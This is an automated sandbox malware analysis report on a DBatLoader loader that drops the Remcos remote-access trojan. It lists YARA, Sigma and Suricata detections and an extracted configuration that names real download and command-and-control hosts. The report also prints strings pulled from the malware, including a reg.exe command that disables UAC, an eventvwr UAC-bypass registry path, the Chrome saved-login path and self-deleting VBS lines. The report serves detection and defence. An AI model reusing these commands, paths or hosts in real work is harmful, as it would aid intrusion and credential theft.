15.2.colorcpl.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
9.2.SndVol.exe.48e0000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.SndVol.exe.48e0000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69378:$a1: Remcos restarted by watchdog! 0x698d0:$a3: %02i:%02i:%02i:%03i 0x69c55:$a4: * Remcos v
9.2.SndVol.exe.48e0000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6437c:$str_a1: C:\Windows\System32\cmd.exe 0x642f8:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x642f8:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x637a8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63fe0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x633a4:$str_b2: Executing file: 0x644c0:$str_b3: GetDirectListeningPort 0x63da0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63fc8:$str_b7: \update.vbs 0x633cc:$str_b9: Downloaded file: 0x633b8:$str_b10: Downloading file: 0x6345c:$str_b12: Failed to upload file: 0x64488:$str_b13: StartForward 0x644a8:$str_b14: StopForward 0x63f70:$str_b15: fso.DeleteFile " 0x63f04:$str_b16: On Error Resume Next 0x63fa0:$str_b17: fso.DeleteFolder " 0x6344c:$str_b18: Uploaded file: 0x6340c:$str_b19: Unable to delete: 0x63f38:$str_b20: while fso.FileExists(" 0x638e1:$str_c0: [Firefox StoredLogins not found]
9.2.SndVol.exe.48e0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63298:$s1: \Classes\mscfile\shell\open\command 0x632f8:$s1: \Classes\mscfile\shell\open\command 0x632e0:$s2: eventvwr.exe
Click to see the 68 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\1m181Ru74o.exe, ProcessId: 7564, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ntmftfld.PIF, NewProcessName: C:\Users\Public\Libraries\Ntmftfld.PIF, OriginalFileName: C:\Users\Public\Libraries\Ntmftfld.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , ProcessId: 8176, ProcessName: Ntmftfld.PIF

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Ntmftfld.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m181Ru74o.exe, ProcessId: 7564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ntmftfld

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Ntmftfld.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m181Ru74o.exe, ProcessId: 7564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ntmftfld

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ntmftfld.PIF, NewProcessName: C:\Users\Public\Libraries\Ntmftfld.PIF, OriginalFileName: C:\Users\Public\Libraries\Ntmftfld.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Users\Public\Libraries\Ntmftfld.PIF" , ProcessId: 8176, ProcessName: Ntmftfld.PIF

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 7944, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T08:13:11.560270+0100	2028371	3	Unknown Traffic	192.168.2.11	49706	103.101.59.23	443	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T08:13:04.679904+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49988	172.111.212.138	1950	TCP
2024-11-26T08:13:41.179260+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49723	172.111.212.138	1950	TCP
2024-11-26T08:14:04.242949+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49776	172.111.212.138	1950	TCP
2024-11-26T08:14:27.274594+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49827	172.111.212.138	1950	TCP
2024-11-26T08:14:50.737461+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49879	172.111.212.138	1950	TCP
2024-11-26T08:15:13.862812+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49931	172.111.212.138	1950	TCP
2024-11-26T08:15:36.901138+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49983	172.111.212.138	1950	TCP
2024-11-26T08:16:00.311436+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49984	172.111.212.138	1950	TCP
2024-11-26T08:16:23.367443+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49985	172.111.212.138	1950	TCP
2024-11-26T08:16:46.429607+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49986	172.111.212.138	1950	TCP
2024-11-26T08:17:09.835546+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.11	49987	172.111.212.138	1950	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1m181Ru74o.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc	Avira URL Cloud: Label: malware
Source: https://aarzoomarine.com/owa	Avira URL Cloud: Label: phishing
Source: https://aarzoomarine.com:443/wp-content/plugins/231_Ntmftfldhfc	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Ntmftfld.PIF

Avira: detection malicious, Label: TR/AD.Nekark.ykcgg

Found malware configuration

Source: 1m181Ru74o.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc"]}
Source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": ["craekuro.duckdns.org:1950:1"], "Assigned name": "$100 MILLION", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-YHG91Z", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Ntmftfld.PIF

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: 1m181Ru74o.exe	ReversingLabs: Detection: 65%
Source: 1m181Ru74o.exe	Virustotal: Detection: 83%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Ntmftfld.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1m181Ru74o.exe

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	9_2_004315EC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04912384 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	9_2_04912384
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	13_2_004315EC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D62384 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	13_2_06D62384

Source: SndVol.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: 1m181Ru74o.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 103.101.59.23:443 -> 192.168.2.11:49706 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: 1m181Ru74o.exe, 00000000.00000002.1425448990.0000000002276000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015AEF000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B1E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D07000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1296854371.00000000028E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.1396974122.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1402280809.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.6.dr

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02EB5908
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	9_2_0041A01B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	9_2_0040B28E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_0040838E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_004087A0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	9_2_00407848
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004068CD FindFirstFileW,FindNextFileW,	9_2_004068CD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0044BA59 FindFirstFileExA,	9_2_0044BA59
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	9_2_0040AA71
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	9_2_00417AAB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	9_2_0040AC78
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E85E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	9_2_048E85E0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E9538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_048E9538
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E7665 FindFirstFileW,FindNextFileW,	9_2_048E7665
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0492C7F1 FindFirstFileExA,	9_2_0492C7F1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048EC026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	9_2_048EC026
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E9126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_048E9126
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048FADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	9_2_048FADB3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048EB809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	9_2_048EB809
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048F8843 FindFirstFileW,	9_2_048F8843
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048EBA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	9_2_048EBA10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_0041A01B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_0040B28E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_0040838E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_004087A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_00407848
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004068CD FindFirstFileW,FindNextFileW,	13_2_004068CD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0044BA59 FindFirstFileExA,	13_2_0044BA59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_0040AA71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_00417AAB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_0040AC78
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D37665 FindFirstFileW,FindNextFileW,	13_2_06D37665
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D7C7F1 FindFirstFileExA,	13_2_06D7C7F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D385E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_06D385E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D39538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_06D39538
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D3C026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_06D3C026
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D39126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_06D39126
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D4ADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_06D4ADB3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D3BA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_06D3BA10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D48843 FindFirstFileW,	13_2_06D48843
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D3B809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_06D3B809

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

9_2_00406D28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49723 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49879 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49827 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49984 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49931 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49985 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49776 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49987 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49983 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49986 -> 172.111.212.138:1950
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49988 -> 172.111.212.138:1950

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc
Source: Malware configuration extractor	URLs: craekuro.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: craekuro.duckdns.org

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02ECE4BC InternetCheckConnectionA,

0_2_02ECE4BC

Source: Joe Sandbox View	ASN Name: IOMART-ASGB IOMART-ASGB
Source: Joe Sandbox View	ASN Name: INPL-IN-APIshansNetworkIN INPL-IN-APIshansNetworkIN

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49706 -> 103.101.59.23:443

Source: global traffic

HTTP traffic detected: GET /wp-content/plugins/231_Ntmftfldhfc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: aarzoomarine.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00424A66 recv,

9_2_00424A66

Source: global traffic

HTTP traffic detected: GET /wp-content/plugins/231_Ntmftfldhfc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: aarzoomarine.com

Source: global traffic	DNS traffic detected: DNS query: aarzoomarine.com
Source: global traffic	DNS traffic detected: DNS query: craekuro.duckdns.org

Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
